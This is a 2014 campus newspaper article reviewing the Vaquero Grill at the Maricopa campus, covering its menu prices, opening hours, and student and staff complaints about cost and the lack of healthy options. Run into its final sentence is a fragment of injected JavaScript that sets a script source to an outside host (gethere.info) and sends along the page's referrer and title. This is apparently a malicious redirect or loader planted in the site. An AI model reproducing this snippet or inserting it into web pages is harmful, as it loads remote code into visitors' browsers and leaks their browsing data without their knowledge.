Vaquero Grill Has Maricopa Campus On The Fence
October 26, 2014
You wake up late for class. In a tizzy, you throw on the cleanest clothes you can find and shoot out the door to your car. But wait! You forgot to eat breakfast, the most important meal of the day. Everyone knows it is difficult to concentrate in class when all you can think about is food. What are you to do?
One need not look any further than the Maricopa campus Vaquero Grill. Located in the C-building, and open from 7:30a.m. to 1:30p.m., offers its customers a wide variety of burgers and sandwiches, add-ons, sides and beverages to boot!
From what I can gather, the Grill’s most popular items are the Classic Cheeseburger, priced at $3.59, Chicken Tenders, four for $4.39, and their French Fries, regular for $1.59 and large for $1.89.
Students think fondly of their on campus food source. When asked what they thought of the food, student Dwayne Guyer stated, “It was okay,” while student Mandii Jordan stated, “I love it! It is pretty good. I have no complaints. They always get it right.”
The price of the food seems to be the largest complaint about the Vaquero Grill. Guyer stated, “A little pricey for college food. I’d rather wait until after class and go to McDonald’s where you can buy a meal for $6 versus $10 here.”
Another complaint I heard about the grill was operating hours, open from 7:30a.m. to 1:30p.m. Library Aide Belinda Clifford stated, “If you come in at 1p.m. for the evening shift, it is not accessible.” Jordan added, “If they were open around dinner time, like 5-ish or 6-ish, I would come here more often.” Perhaps the grill should look into closing at a later time!
When asked what people would like to see added to the menu, Library Aide Belinda Clifford stated, “Less sugary drinks would be nice. I can’t drink what they have available. They have Diet Coke, Diet Pepsi, and unsweetened ice tea.” Both Jordan and Guyer agree. We need more options! Guyer added, “They do not have a lot to offer. They could improve their menu. Signal Peak’s grill has much more variety. More healthy food options, like salads, would be nice.” I believe Jordan described it perfectly, “It is more like bar food.”
I agree with Guyer. We need to see more healthy alternatives on the menu. Being a vegetarian, I would like to see changes made to the menu to make it more vegetarian and vegan friendly. While I do enjoy a good veggie burger and fries, that gets boring after a while. In order to receive more business, the grill should look into improving their selection.
Although the students and staff would like to see more variety and longer hours, they still love their Vaquero Grill. Clifford stated, “Everyone is friendly there. They make it very enjoyable stopping in.”s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
